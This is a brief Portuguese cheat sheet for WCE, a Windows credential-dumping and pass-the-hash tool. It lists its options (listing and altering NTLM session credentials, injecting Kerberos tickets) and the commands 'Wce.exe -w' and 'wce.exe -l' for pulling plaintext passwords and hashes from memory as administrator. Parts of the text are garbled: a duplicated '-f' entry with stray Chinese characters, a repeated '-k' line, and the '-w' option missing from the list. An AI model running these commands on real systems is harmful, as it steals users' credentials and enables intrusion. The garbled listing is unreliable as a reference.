
Window Hash&Password dump
Wce é uma ferramenta lendária para injeção de hash, podendo ser usada não apenas para injeção de hash, mas também para obter diretamente texto puro ou hash. Esta ferramenta possui versões de 32 e 64 bits.
help
Descrição dos parâmetros:
l Lista as sessões conectadas e as credenciais NTLM (padrão);
s Modifica as credenciais NTLM da sessão de logon atual; parâmetros:<usuário>:<domínio>:<hash LM>:<hash NT>;
r Lista periodicamente as sessões conectadas e as credenciais NTLM; se uma nova sessão for encontrada, lista novamente a cada 5 segundos;
c Executa uma nova sessão com uma credencial NTML especial; parâmetros:<cmd>;
e Lista periodicamente as sessões conectadas e as credenciais NTLM; quando ocorrer um evento de logon, lista novamente;
o Salva toda a saída em um arquivo; parâmetros:<nome do arquivo>;
i Especifica um LUID em vez de usar a sessão de logon atual; parâmetros:<luid>.
d Remove as credenciais NTLM da sessão de logon; parâmetros:<luid>;
a Usa um endereço; parâmetros: <endereço>;
f Força o modo de segurança
g Gera os hashes LM e NT; parâmetros<senha>
f Força o modo de segurança; 希 parâmetros<senha>; (formato wce para unix e windows);;;
k Lê um ticket kerberos de um arquivo e o insere no cache do windows
k Lê um ticket kerberos de um arquivo e o insere no cache do windows;
v Saída detalhada;
Capturar a senha em texto puro do usuário (executar como administrador):
Wce.exe -w
password
Capturar o valor do hash:
wce.exe -l
hash